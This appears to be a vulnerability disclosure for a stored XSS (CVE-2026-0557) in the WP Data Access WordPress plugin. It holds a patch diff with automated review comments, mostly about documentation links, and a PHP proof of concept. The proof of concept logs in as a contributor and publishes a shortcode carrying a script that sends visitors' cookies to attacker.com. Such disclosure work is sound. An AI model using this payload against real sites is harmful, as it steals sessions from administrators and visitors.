-							onClick="window.open('https://wpdataaccess.com/documentation/', '_blank')"
-						>
-							<span class="wpda-hot-title">
-								Documentation
-							</span>
-							<span class="wpda-hot-topic">
-								Where can I find the online documentation?
-							</span>
-						</button>
-
-						<button>
+                        <button
+                                onClick="window.open('https://docs.rad.wpdataaccess.com/hooks/', '_blank')"
+                        >
 							<span class="wpda-hot-title">
-								Downloadable Demo Apps
+								App Builder Hooks
 							</span>
-							<span class="wpda-hot-topic" style="display: inline-grid; grid-template-columns: auto auto; gap: 20px;">
-                                <a href="https://wpdataaccess.com/docs/app-demos/app-student-administration-system/" target="_blank">
-                                    <i class="fa-solid fa-up-right-from-square"></i>
-                                    Student Administration System
-                                </a>
-                                <a href="https://wpdataaccess.com/docs/app-demos/app-classic-models/" target="_blank">
-                                    <i class="fa-solid fa-up-right-from-square"></i>
-                                    Classic Models
-                                </a>
+                            <span class="wpda-hot-topic">
+                                Write hook to customize app behavior.
 							</span>
-						</button>
+                        </button>

 						<button
-							onClick="window.open('https://wpdataaccess.com/docs/remote-databases/mysql-mariadb/', '_blank')"
+							onClick="window.open('https://docs.remote.wpdataaccess.com/mysql.html', '_blank')"
 						>
 							<span class="wpda-hot-title">
 								Remote connections
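Review bot: the topic text at the `+` line `Write hook to customize app behavior.` should read `Write hooks to customize app behavior.`; more substantively, navigation in both the new App Builder Hooks button and the retained Remote connections button still goes through inline `onClick="window.open(...)"` handlers, which a site Content-Security-Policy without `'unsafe-inline'` for scripts will block. A plain `<a href="..." target="_blank" rel="noopener">` styled as a button carries the same link with no inline script. The added `<button>` and `</button>` lines are also space-indented where the surrounding markup uses tabs.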
@@ -481,7 +458,7 @@
 						</button>

 						<button
-							onClick="window.open('https://wpdataaccess.com/docs/remote-connection-wizard/start-here/', '_blank')"
+							onClick="window.open('https://docs.remote.wpdataaccess.com/pds/start-here.html', '_blank')"
 						>
 							<span class="wpda-hot-title">
 								Premium Data Services
@@ -490,6 +467,17 @@
 								How can I use Premium Data Services for remote connections?
 							</span>
 						</button>
+
+                        <button
+                                onClick="window.open('https://docs.rad.wpdataaccess.com/', '_blank')"
+                        >
+							<span class="wpda-hot-title">
+								Documentation
+							</span>
+                            <span class="wpda-hot-topic">
+								Where can I find the online documentation?
+							</span>
+                        </button>
 					</div>
 				</div>
 			</div>
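Review bot: the Documentation button added here is the one removed earlier in this file (old URL `https://wpdataaccess.com/documentation/`, new URL `https://docs.rad.wpdataaccess.com/`), so this is a move plus a URL change rather than a new control; keeping it in its original position would reduce the diff to a one-line URL change and make the intent obvious. As with the other added button, the `<button`, `onClick`, `>`, `<span class="wpda-hot-topic">` and `</button>` lines are space-indented while the `wpda-hot-title` span between them keeps tabs.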
--- a/wp-data-access/WPDataProjects/WPDP.php
+++ b/wp-data-access/WPDataProjects/WPDP.php
@@ -203,7 +203,7 @@
         echo $this->projects_page_title;
         ?></span>
 					<a href="<?php
-        echo 'https://wpdataaccess.com/docs/data-forms/data-projects/';
+        echo 'https://docs.legacy.wpdataaccess.com/docs/data-projects/';
         ?>" target="_blank">
 						<span class="dashicons dashicons-editor-help"
 							  style="text-decoration:none;vertical-align:top;font-size:30px;">
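Review bot: the replacement at `echo 'https://docs.legacy.wpdataaccess.com/docs/data-projects/';` writes the value straight into an `href` attribute; it is a literal, so there is no injection path, but WordPress coding standards expect attribute URLs to pass through `esc_url()`, i.e. `echo esc_url( 'https://docs.legacy.wpdataaccess.com/docs/data-projects/' );`, which also keeps the WPCS output-escaping sniff quiet. The same applies to the `project-templates` hunk that follows.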
@@ -228,7 +228,7 @@
         echo $this->projects_page_title;
         ?></span>
 					<a href="<?php
-        echo 'https://wpdataaccess.com/docs/templates/project-templates/';
+        echo 'https://docs.legacy.wpdataaccess.com/docs/project-templates/';
         ?>" target="_blank">
 						<span class="dashicons dashicons-editor-help"
 							  style="text-decoration:none;vertical-align:top;font-size:30px;">
--- a/wp-data-access/admin/class-wp-data-access-admin.php
+++ b/wp-data-access/admin/class-wp-data-access-admin.php
@@ -1055,7 +1055,7 @@
 		<div class="wrap">
 			<h1 class="wp-heading-inline">
 				<span>Data Designer</span>
-				<a href="https://wpdataaccess.com/docs/data-designer/data-designer-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
+				<a href="https://docs.legacy.wpdataaccess.com/docs/data-designer-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
 					<span class="dashicons dashicons-editor-help" style="text-decoration:none;vertical-align:top;font-size:30px;">
 					</span>
 				</a>
@@ -1111,7 +1111,7 @@
 		<div class="wrap">
 			<h1 class="wp-heading-inline">
 				<span>Data Tables</span>
-				<a href="https://wpdataaccess.com/docs/data-tables/data-tables-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
+				<a href="https://docs.legacy.wpdataaccess.com/docs/data-tables-getting-started/" target="_blank" class="wpda_tooltip" title="Plugin Help - opens in a new tab or window">
 					<span class="dashicons dashicons-editor-help" style="text-decoration:none;vertical-align:top;font-size:30px;">
 					</span>
 				</a>
--- a/wp-data-access/includes/class-wp-data-access.php
+++ b/wp-data-access/includes/class-wp-data-access.php
@@ -374,7 +374,7 @@
             'wpda_set_hard_row_count',
             function ( $dbs, $tbl ) {
                 // Only admins and super admins.
-                if ( current_user_can( 'manage_options' ) || current_user_can( 'manage_sites' ) ) {
+                if ( WPDA::current_user_is_admin() ) {
                     // Get actual row count.
                     $count = WPDataAccessAPIWPDA_Actions::get_row_count( $dbs, $tbl );
                     // Get table settings.
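Review bot: the replacement condition `if ( WPDA::current_user_is_admin() ) {` centralizes the capability check, but the helper's body is not in this patch, so confirm it still requires `manage_options` or `manage_sites` (the two capabilities the removed line checked) and nothing weaker, since this branch gates the `wpda_set_hard_row_count` hook; the comment `// Only admins and super admins.` above it must stay accurate. If the helper is shared with other call sites, a unit test pinning its result for contributor, editor, administrator and super admin roles would catch a future relaxation.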
--- a/wp-data-access/wp-data-access.php
+++ b/wp-data-access/wp-data-access.php
@@ -4,7 +4,7 @@
  * Plugin Name:       WP Data Access
  * Plugin URI:        https://wpdataaccess.com/
  * Description:       A powerful data-driven App Builder with an intuitive Table Builder, a highly customizable Form Builder and interactive Chart support in 35 languages
- * Version:           5.5.63
+ * Version:           5.5.64
  * Author:            Passionate Programmers B.V.
  * Author URI:        https://wpdataaccess.com/
  * Text Domain:       wp-data-access
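Review bot: this hunk only bumps the plugin header from `Version: 5.5.63` to `Version: 5.5.64`; no readme.txt `Stable tag` change or changelog entry appears in the patch as shown, so the update notice gives site owners nothing that says this release closes a stored XSS. Add a changelog line naming the security fix so the update is prioritized.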

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0557 - WP Data Access <= 5.5.63 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpda_app' Shortcode

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/post.php';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to steal admin cookies via XSS
$malicious_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Create a post with malicious wpda_app shortcode
$post_data = [
    'post_title' => 'Vulnerable Post',
    'post_content' => '[wpda_app app_id="1" xss="' . $malicious_payload . '"]',
    'post_status' => 'publish',
    'post_type' => 'post'
];

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// First, get login page to obtain nonce
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-login.php');
$login_page = curl_exec($ch);

// Extract login nonce (simplified - real implementation would parse HTML)
// WordPress uses 'log' and 'pwd' parameters for login

// Perform login
$login_params = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'http://vulnerable-wordpress-site.com/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_params));
$login_response = curl_exec($ch);

// Check if login succeeded by accessing admin page
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$admin_page = curl_exec($ch);

if (strpos($admin_page, 'Dashboard') === false) {
    echo "Login failed. Check credentials.\n";
    exit;
}

echo "Logged in successfully as contributor.\n";

// Now create the malicious post
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, true);

// Get nonce for post creation (simplified)
$post_params = array_merge($post_data, [
    '_wpnonce' => 'extracted_nonce_here', // Would need to extract from page
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'publish' => 'Publish'
]);

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_params));
$post_response = curl_exec($ch);

if (strpos($post_response, 'Post published') !== false || strpos($post_response, 'Post updated') !== false) {
    echo "Malicious post created successfully with XSS payload.\n";
    echo "When any user views this post, their cookies will be sent to attacker.com.\n";
} else {
    echo "Failed to create post.\n";
}

curl_close($ch);

?>
